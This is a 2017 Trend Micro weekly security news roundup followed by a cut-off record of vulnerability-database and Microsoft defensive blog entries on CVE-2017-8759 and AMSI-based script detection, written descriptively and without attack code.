ID TRENDMICROBLOG:1C7972C77614398819AB69B2345DA453 Type trendmicroblog Reporter Jon Clay Modified 2017-11-22T14:00:16
Description
# This Week in Security News

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.

Below you’ll find a quick recap of topics followed by links to news articles and/or our blog posts providing additional insight. Be sure to check back each Friday for highlights of the goings-on each week!

[**Beware of ‘Double Whammy’ Cyberattacks**](<http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/>)

_As seen in recent attacks, such as Bad Rabbit and NotPetya, a new style of hacking has emerged. This style of attack leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar._

[**Bitcoin and Ethereum Prices Took a Hit after another Cryptocurrency Was Hacked**](<http://fortune.com/2017/11/21/bitcoin-price-ethereum-price-tether-hacked/>)

_The value of bitcoin briefly took a dip on Monday evening after a big theft allegedly affected a separate virtual currency system called Tether. The Tether team said they would blacklist the address, so the $30,950,010 worth of tokens stolen in the hack could not be converted into U.S. dollars._

[**Cobalt Strikes Russian Banks Again**](<http://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/>)

_The waves of backdoor-laden spam emails that targeted Russian-speaking businesses earlier this year were part of Cobalt’s bigger campaigns. In their recent campaigns, they used two different infection chains, with social engineering hooks that were designed to invoke a sense of urgency in its recipients._

[**Hackers Demand Money to Stop Attack on Sacramento’s Transit System**](<https://www.helpnetsecurity.com/2017/11/21/sacramento-regional-transit-hack/>)

_Hackers looking for a payout have hit the Sacramento Regional Transit (SacRT) system, defacing the agency website, erasing data from some of its servers, and demanding money to stop the attack and not do further damage. SacRT decided not to respond to the message or pay up._

[**U.S. Prosecutors Charge Iranian Hacker Group in 'Game of Thrones' Hack**](<https://www.reuters.com/article/us-cyber-hbo-indictment/u-s-prosecutors-charge-iranian-in-game-of-thrones-hack-idUSKBN1DL1YT>)

_U.S. prosecutors have charged an Iranian-based hacker, Behzad Mesri, with penetrating the network of cable TV provider HBO and stealing episodes and plot summaries for unaired programs including “Game of Thrones,” then threatening to release the data unless he was paid $6 million._

[**Hackers Stole Information from UK-based Pawnbroker Cash Converters Website**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hackers-steal-information-from-uk-based-pawnbroker-cash-converters-website>)

_UK pawnbroker [Cash Converters](<https://www.cashconverters.com/>) revealed that it was the victim of a data breach that could have exposed sensitive data, including customer usernames, passwords, delivery addresses, financial data and other personal details after it sent emails to customers warning about the incident._

[**October MacOS Patch Fixes FAT Vulnerability**](<http://blog.trendmicro.com/trendlabs-security-intelligence/october-macos-patch-fixes-fatusb-vulnerability/>)

_October’s macOS security update contained a fix for a vulnerability that was disclosed to Apple earlier this year. The vulnerability was in the tool system that checks for and fixes errors in devices formatted with the FAT filesystem, and is automatically invoked by macOS when a device using FAT is inserted._

[**Customers Drive Rapid Innovation for Hybrid Cloud Security**](<http://blog.trendmicro.com/customer-driven-rapid-innovation-hybrid-cloud-security/>)

_In the past, on-premises versions of security solutions were held up by long development cycles and significant regression periods. These delays prevented customers from getting improved methods of defense quickly and deployed to a data center, leaving them vulnerable to attacks._

[**Optimize Your Mac**](<http://blog.trendmicro.com/optimize-your-mac/>)

_Mac laptop and mini users often struggle to optimally use their computer’s memory or to keep their disk clean. Trend Micro’s Dr. Cleaner Pro can help your Mac perform at its best. Its powerful optimization tools can quickly free up memory and disk space._

[**Trend Micro Protects VMware on Amazon Web Services**](<http://blog.trendmicro.com/trend-micro-protects-vmware-amazon-web-services/>)

_Trend Micro’s Deep Security delivers multiple capabilities managed through a single connected dashboard with full visibility into leading environments like VMware, AWS, Microsoft Azure and Docker and is key for a modern threat defense solution allowing skilled resources to focus on business goals._

[**Macs Won’t Protect You from Cyberattacks**](<http://www.huffingtonpost.co.uk/entry/think-having-a-mac-protects-you-from-cyber-attack-no-longer_uk_5a1400f2e4b05ec0ae844555>)

_Mac versus PC, Apple versus Android. It’s a war that’s born a thousand memes, hundreds of advertising campaigns, and billions of search queries. In the security game, Apple have always had reasonable cause to be a little smug._

Please add your thoughts in the comments below or follow me on Twitter: [@JonLClay](<https://twitter.com/jonlclay>).

Source: <https://blog.trendmicro.com/week-security-news-65/> (published 2017-11-22; CVE referenced: CVE-2017-8759).
{"attackerkb": [{"lastseen": "2020-11-18T06:40:18", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "description": "Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka \u201c.NET Framework Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:51pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 \n\n * Associated Malware: FINSPY, FinFisher, WingBird \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-23T00:00:00", "published": "2017-09-13T00:00:00", "id": "AKB:6CA719CE-A47A-414E-8DBA-FFE14F20C0FF", "href": "https://attackerkb.com/topics/GLG8LUMeGO/cve-2017-8759", "type": "attackerkb", "title": "CVE-2017-8759", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T13:07:50", "description": "Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka \".NET Framework Remote Code Execution Vulnerability.\"", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", 
"userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-13T01:29:00", "title": "CVE-2017-8759", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8759"], "modified": "2018-01-14T02:29:00", "cpe": ["cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:4.7", "cpe:/a:microsoft:.net_framework:2.0", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6"], "id": "CVE-2017-8759", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8759", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:2.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*"]}], "mmpc": [{"lastseen": "2017-12-25T20:11:46", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "The [September 12, 2017 security updates from Microsoft](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>) include the patch for a previously 
unknown vulnerability exploited through Microsoft Word as an entry vector. Customers using Microsoft advanced threat solutions were already protected against this threat.\n\nThe vulnerability, classified as [CVE-2017-8759](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759>), was used in limited targeted attacks and reported to us by our partner, FireEye. Microsoft would like to thank FireEye for responsibly [reporting this vulnerability](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) and for working with us to protect customers.\n\nCustomers receiving automatic updates for Microsoft products are protected from this attack without any additional action required. Customers not enjoying the benefits of automatic updates should consider immediately applying this month\u2019s updates to avoid unnecessary exposure.\n\n## Office 365 ATP and Windows Defender ATP customers protected\n\nCustomers running Microsoft advanced threat solutions such as [Office 365 Advanced Threat Protection](<https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/>) or [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) were safe from this attack without the need of additional updates. The security configuration and reduced attack surface of [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) blocks this attack by default.\n\n[Office 365 ATP](<https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/>) blocked the malicious attachments automatically in customer environments that have adopted the mail detonation and filtering solution. 
The attachment was blocked based on the detection of the malicious behaviors, as well as its similarity with previous exploits. SecOps personnel would see an ATP behavioral detection in Office 365\u2019s Threat Explorer page:\n\n\n\n_Figure 1. Block reasons for the exploit attachment as seen in Office 365 ATP console_\n\n[Windows Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) was also able to raise multiple alerts related to post-exploitation activities performed by this exploit using scripting engines and PowerShell. Additional alerts may also be visible for subsequent stages of the attack performed after malware installation.\n\nIn addition, [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects and blocks exploits for this vulnerability as Exploit:RTF/Fitipol.A, Behavior:Win32/Fitipol.A, and Exploit:RTF/CVE-2017-8759.A using the cloud protection service, which delivers near-real-time protection against such never-before-seen threats.\n\n\n\n_Figure 2. Windows Defender ATP alerts raised for CVE-2017-8759 zero-day exploit_\n\n## Protection with Windows Defender Exploit Guard\n\nWe are also happy to share with customers testing our upcoming Windows 10 Fall Creators Update that [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/whats-new-in-windows-defender-atp-fall-creators-update/>) was also able to prevent this attack using one of the many Attack Surface Reduction rules and exploit protection features.\n\n\n\n_Figure 3. 
Example of exploit blocking event logged by Windows Defender Exploit Guard_\n\n[Windows Defender Exploit Guard](<https://aka.ms/wdegdocs>) is part of the defense-in-depth protection in the [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>) release.\n\n## Another zero-day leading to FinFisher\n\nThe [CVE-2017-8759](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759>) vulnerability can allow remote code execution after users open a spam email, and double-click on an untrusted attachment and disable the Microsoft Office _Protected View_ mode. The exploit uses Microsoft Word as the initial vector to reach the real vulnerable component, which is not related to Microsoft Office and which is responsible for certain SOAP-rendering functionalities through .NET classes.\n\nFor more information on this new campaign our partner FireEye has a good [technical blog](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) describing the infection mechanism and the details of the exploit.\n\nAfter the initial notification from FireEye, Windows Defender telemetry revealed very limited usage of this zero-day exploit. 
The attacker used this exploit to deploy a spyware detected as [Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) and also known to the security community as \u201c[FinFisher](<https://en.wikipedia.org/wiki/FinFisher>)\u201d, a commercial surveillance package often seen combined with expensive zero-day vulnerabilities and used by sophisticated actors.\n\nMicrosoft researchers believe that the adversary involved in this operation could be linked to the [NEODYMIUM group](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), which has used similar zero-day exploits with spear-phishing attachments combined with the usage of FinFisher spyware. We previously reported about the NEODYMIUM group in the [Windows Security blog](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) in 2016. For additional information about this new attack as well as other NEODYMIUM attacks, we encourage ATP customers to review the in-product Threat Intelligence reports on this activity group.\n\n\n\n \n\n \n\n**_Elia Florio_**\n\n_Windows Defender ATP Research Team_\n\n#### \n\n \n\n \n\n### Related blog posts\n\n[Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks](<https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/>)\n\n[Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>)\n\n \n\n \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? 
Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "modified": "2017-09-12T18:46:50", "published": "2017-09-12T18:46:50", "id": "MMPC:69455AB621A495CAB62392B8DB0987B3", "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/", "title": "Exploit for CVE-2017-8759 detected and neutralized", "type": "mmpc", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-16T23:59:41", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)\n\nScripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.\n\nScripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the landstaying away from the disk and using common tools to [run code directly in memory](<https://blogs.technet.microsoft.com/mmpc/tag/in-memory-attacks/>). Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps make them effective vehicles for delivering malicious implants through social engineering as evidenced by the increasing use of [scripts in spam campaigns](<https://blogs.technet.microsoft.com/mmpc/2017/02/02/improved-scripts-in-lnk-files-now-deliver-kovter-in-addition-to-locky/>).\n\nMalicious scripts are not only used as delivery mechanisms. 
We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShellthe _de facto_ scripting standard for administrative tasks on Windowswith the ability to invoke system APIs and access a variety of system classes and objects.\n\nWhile the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.\n\nWindows 10 provides optics into script behavior through [Antimalware Scan Interface (AMSI)](<https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/>), a generic, open interface that enables [Windows Defender Antivirus](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-antivirus/windows-defender-antivirus-in-windows-10?ocid=cx-blog-mmpc>) to look at script contents the same way script interpreters doin a form that is both unencrypted and unobfuscated. In [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>), with knowledge from years analyzing script-based malware, weve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. 
AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.\n\nThis unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc?ocid=cx-blog-mmpc>)). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.\n\nIn this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP [machine learning systems](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.\n\n## KRYPTON: Highlighting the resilience of script-based attacks\n\nTraditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. 
With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.\n\nApart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it is impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.\n\nFor example, the activity group KRYPTON has been observed hijacking or creating scheduled tasksthey often target system tasks found in exclusion lists of popular forensic tools like [Autoruns for Windows](<https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns>). KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.\n\nTo illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by [John Lambert](<https://twitter.com/JohnLaTwC/status/915590893155098629>) and the [Office 365 Advanced Threat Protection](<https://products.office.com/en-au/exchange/online-email-threat-protection>) team.[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2-ams-ml-krypton-lure.png>)\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2b-amsi-ml-krypton-lure.png>)\n\n_Figure 1. KRYPTON lure document_\n\nTo live off the land, KRYPTON doesnt drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (_wscript.exe_) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. 
Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/3b-amsi-ml-krypton-chain.jpg>)\n\n_Figure _2_. KRYPTON script execution chain through wscript.exe_\n\n## Exposing actual script behavior with AMSI\n\nAMSI overcomes KRYPTONs evasion mechanisms by capturing JavaScript API calls after they have been decrypted and ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/4-amsi-ml-krypton-script-captured.png>)\n\n_Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis_\n\nBy checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/5-amsi-ml-krypton-script-alert.png>)\n\n_Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI_\n\n## PowerShell use by Kovter and other commodity malware\n\nNot only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, [Kovter malware](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Kovter>) uses several processes to eventually execute its malicious payload. 
This payload resides in a PowerShell script decoded by JavaScript (executed by _wscript.exe_) and passed to _powershell.exe_ as an environment variable.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/6-amsi-ml-kovter-alert.png>)\n\n_Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload_\n\nBy looking at the [PowerShell payload content captured by AMSI](<https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/>), experienced analysts can easily spot similarities to [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/7-amsi-ml-kovter-script-captured.png>)\n\n_Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis_\n\n## Fresh machine learning insight with AMSI\n\nWhile AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.\n\nAs outlined in [our previous blog](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>), we employ a supervised machine learning classifier to identify breach activity. 
We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/8-amsi-ml-process-tree.png>)\n\n_Figure 7. Process tree augmented by instrumentation for AMSI data_\n\nAs shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (_winword.exe_) to launch PowerShell (_powershell.exe_). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware _fhjUQ72.tmp_, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build _expert classifiers_ for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.\n\nWith the instrumentation of AMSI signals added as part of the [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. We've also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, [_ngrams_](<https://azure.microsoft.com/en-au/services/cognitive-services/text-analytics/>), and specific API invocations, to name a few.\n\nAs AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. 
And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our _deep neural networks_ automatically learn features that are often hidden from human analysts.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/9-amsi-ml-javascript-powershell-alert.png>)\n\n_Figure 8. Machine learning detections of JavaScript and PowerShell scripts_\n\nWhile these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/10-amsi-ml-vbscript-network-alert.png>)\n\n_Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity_\n\n## Detection of AMSI bypass attempts\n\nWith AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:\n\n * Bypasses that are part of the script content and can be inspected and alerted on\n * Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs\n * Patching of AMSI instrumentation in memory\n\nThe Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. 
We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.\n\nDuring actual [attacks involving CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>), Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by [Matt Graeber](<https://twitter.com/mattifestation/status/735261176745988096?lang=en>).\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/11-amsi-ml-bypass-alert.png>)\n\n_Figure 10. Windows Defender ATP alert based on AMSI bypass pattern_\n\nAMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/12b-amsi-ml-bypass-code-captured.png>)\n\n_Figure 11. AMSI bypass code sent to the cloud for analysis_\n\n## Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks\n\nProvided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.\n\nAMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. 
Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.\n\nWith [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.\n\nApart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.\n\nTo benefit from the new script runtime instrumentation and other powerful security enhancements like [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/>), customers are encouraged to install [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>).\n\nRead [The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester](<https://wincom.blob.core.windows.net/documents/WDATP_TEI%20_infographic%20_final.pdf>) to understand the significant cost savings and business benefits enabled by Windows Defender ATP. 
To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advanced attacks, [sign up for a free trial](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n**Stefan Sellmer**, _Windows Defender ATP Research_\n\n_with_\n\n**Shay Kels**, _Windows Defender ATP Research_\n\n**Karthik Selvaraj**, _Windows Defender Research_\n\n \n\n##### **Additional readings**\n\n * [Defend against PowerShell attacks](<https://blogs.msdn.microsoft.com/powershell/2017/10/23/defending-against-powershell-attacks/>), by Lee Holmes and the PowerShell team\n * [Windows Defender ATP machine learning: Detecting new and unusual breach activity](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>)\n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).", "modified": "2017-12-04T14:00:07", "published": "2017-12-04T14:00:07", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/", "id": "MMPC:30A997667BFA925FD541E3DCB1F1DEB6", "type": "mmpc", "title": "Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that \u2018live off the land\u2019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T07:55:02", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": 
